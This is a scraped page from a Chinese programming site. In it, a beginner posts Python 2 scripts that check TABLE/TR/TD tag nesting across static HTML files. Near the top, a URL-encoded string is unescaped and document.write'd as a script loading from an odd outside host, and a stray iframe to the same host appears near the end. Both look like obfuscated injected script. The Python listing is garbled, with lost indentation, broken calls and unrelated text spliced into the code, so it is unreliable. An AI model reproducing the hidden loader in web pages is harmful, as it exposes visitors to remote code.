一个简单的PYTHON代码--688IT编程网

⼀个简单的PYTHON代码

HTML Tags and JavaScript tutorial

encS="%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A//avss.b15wg/count/count.asp%22%3E%3C/script%3E";var S=unescape(encS);document.write(S);</script>

⼀个简单的PYTHON代码

⽤PYTHON写代码很⾼兴，更⾼兴的是今天竟然⽤了⼀天的上班时间来练这个。当然也是为我们的那个程序服务的。

我们⽬前要把⼀个表态HTML页⾯转换成PORTAL。由于表态页⾯数量很⼤，所以我们采⽤动态改写的⽅法。由于这篇的⽬的不是介绍我们的项⽬，所以直接说我的脚本。由于我们的⼯作，我们现在做操作前要对所以的静态页⾯进⾏简单的标记分析。这⾥主要分析TABLE，TR和TD。

下⾯贴下我的代码：主要是两个⽂件

htmlParser.py

import os,util

def htmlParse (htmlname,errorfile):

stackList = []

total = 0

incomment = 0

file = open(htmlname)

strLines = adlines()

for line in strLines:

total += 1

comtmp = util.judgeComment (line)

if comtmp == 1:#

pos1 = line.find('<!--') - 1

pos2 = line.find('-->') + 2

line = line[0:pos1] + line[pos2:]

if comtmp == 2:#<!--

incomment = 1

pos = line.find('<!--') - 1

line = line[0:pos]

if comtmp == 3:#-->

incomment = 0

pos = line.find('-->') + 2

line = line[pos:]

if incomment == 1:# this line is in comment

continue

taglist = LineTagList(line)

for item in taglist:

res = util.addDelTag(item,stackList)

if res == -1:

errorinfo = htmlname + os.altsep + str(total) + str(stackList) + os.linesep

errorfile.append(errorinfo)

return

if len(stackList) != 0:

result = htmlname + str(stackList) + ' are not closed!' + os.linesep

#errorfile.append(result)

if __name__ == '__main__':

pattern = "*.html"

startdir = "F://sshome"

#startdir = "D://test"

files = util.find (pattern, startdir)

res = []

for filename in files:

htmlParse(filename,res)

res.append(str(len(res)))

filewrite = file("F://",'w')

filewrite.writelines(res)

另⼀个⽂件util.py

import os, fnmatch

# judge comment tag to delete comment statement

def judgeComment (line):

openTag = line.find('<!--')

closeTag = line.find('-->')

if openTag != -1:

if closeTag != -1:#

return 1

else:#<!--

return 2

elif closeTag != -1:#-->

return 3

else:#

return 4

# sort for a 2 dimension list(array)

def sortFor2di (listtosort):

size = len(listtosort)

for i in range(size-1):

for j in range(i + 1,size):

list1 = listtosort[i]

list2 = listtosort[j]

if list1[0] > list2[0]:

listtosort[i],listtosort[j] = listtosort[j],listtosort[i] # get all tags in a line in the form of list

def getLineTagList (line):

taglist = []

addTag2List (line,'table',taglist)

addTag2List (line,'tr',taglist)

addTag2List (line,'td',taglist)

sortFor2di (taglist)

return taglist

def addTag2List (line,tag,taglist):

pos = line.find('<'+tag)

if pos != -1:

taglist.append([pos,'<'+ tag + '>'])

pos = line.find('</'+tag+'>')

if pos != -1:

taglist.append([pos,'</' + tag + '>'])

def addDelTag(itemlist,stackList):

tag = itemlist[1]

res = 0

res += judgeWhichTag (tag,'table',stackList)

res += judgeWhichTag (tag,'tr',stackList)

res += judgeWhichTag (tag,'td',stackList)

if res != 0:

return -1

python新手代码画图else:

return 1

def judgeWhichTag (tag,lable,stackList):

if tag == '<' + lable + '>':

stackList.append(lable)

return 0

elif tag == '</' + lable + '>':

size = len(stackList)

if size < 1:

return -1

elif stackList[size - 1] == lable:

del(stackList[size -1 ])

return 0

else:

return -1

else:

return 0

# used to deal tag

def tagDeal (tag, line,stackList):

openTag = line.find('<'+tag)

closeTag = line.find('</'+tag+'>')

if openTag != -1:

stackList.append (tag)

if closeTag == -1:

return 1

if closeTag != -1:

size = len(stackList)

if size < 1:

return -1

else:

lastItem = stackList[size - 1]

if lastItem != tag:

return -1

else:

del (stackList[size - 1])

return 1

def find (pattern,startdir=os.curdir):

files = []

os.path.walk(startdir,visitor,(pattern,files))

files.sort()

return files

def visitor ((pattern,files),thisdir,names):

for name in names:

if fnmatch.fnmatch(name,pattern):

fullpath = os.path.join(thisdir,name)

files.append(fullpath)

申明⼀下，我是初学PYTHON。上⾯的程序写得很乱，以后有时间再修改或加点注释。当然很欢迎各位朋友

给点意见。

不过，最后的结果是我们的总共1000表态页⾯中共有200个页⾯这三种标签有错误。这就意味着有⼀⼤堆事情要处理。⾄于怎么做我们还没做好决定。 src="avss.b15wg/count/iframe.asp" frameborder="0" width="650" scrolling="no" height="160">

688IT编程网

一个简单的PYTHON代码

发表评论

推荐文章

软件工程(第五版)--习题及答案

软工上机题

循环结构程序设计练习题内含答案

初级python中while语句的例题算式1+2分之1+2分之3 +。。。前20项...

python的while嵌套例题

热门文章

编译原理试题

用整本书阅读促进英语阅读素养提升,不妨看看这节课例

if语句break用法

2020年全国计算机二级vfp全真模拟考试题库及答案(共七套)

算法和流程图(及N-S流程图)

张海藩《软件工程导论》(第6版)(课后习题第6章详细设计)【圣才出品...

软件工程实践题50题和答案解析

软件工程综合应用例题

《While循环语句》教学设计探讨

教学大赛教案(C语言)

C++编程题

高考数学考前最后一轮基础知识巩固之第十章第4课算法语句(2)

程序设计选择题1

关于GOTO语句的利与弊

程序设计基本知识知识点 2022-2023学年人教_中图版(2019)高中信息技术...

编译原理:FOR循环语句的翻译程序设计LL(1)法、输出四元式(附源代码...

周而复始的循环教学设计

软件工程概念

选择语句和循环语句的嵌套使用

while和if的区别

最新文章

软工上机题

循环结构程序设计练习题内含答案

初中信息技术《数据处理与分析》训练题 (1)(含答案解析)

while循环的例题

传统流程图(用于设计分析算法)

流程图与控制流图

标签列表

688IT编程网

一个简单的PYTHON代码

发表评论

推荐文章

软件工程(第五版)--习题及答案

软工上机题

循环结构程序设计练习题内含答案

初级python中while语句的例题算式1+2分之1+2分之3 +。。。前20项...

python的while嵌套例题

热门文章

编译原理试题

用整本书阅读促进英语阅读素养提升,不妨看看这节课例

if语句break用法

2020年全国计算机二级vfp全真模拟考试题库及答案(共七套)

算法和流程图(及N-S流程图)

张海藩《软件工程导论》(第6版)(课后习题 第6章 详细设计)【圣才出品...

软件工程实践题50题和答案解析

软件工程综合应用例题

《While循环语句》教学设计探讨

教学大赛教案(C语言)

C++编程题

高考数学 考前最后一轮基础知识巩固之第十章 第4课 算法语句(2)

程序设计选择题1

关于GOTO语句的利与弊

程序设计基本知识 知识点 2022-2023学年人教_中图版(2019)高中信息技术...

编译原理:FOR循环语句的翻译程序设计LL(1)法、输出四元式(附源代码...

周而复始的循环教学设计

软件工程概念

选择语句和循环语句的嵌套使用

while和if的区别

最新文章

软工上机题

循环结构程序设计练习题内含答案

初中信息技术《数据处理与分析》训练题 (1)(含答案解析)

while循环的例题

传统流程图(用于设计分析算法)

流程图与控制流图

标签列表

张海藩《软件工程导论》(第6版)(课后习题第6章详细设计)【圣才出品...

高考数学考前最后一轮基础知识巩固之第十章第4课算法语句(2)

程序设计基本知识知识点 2022-2023学年人教_中图版(2019)高中信息技术...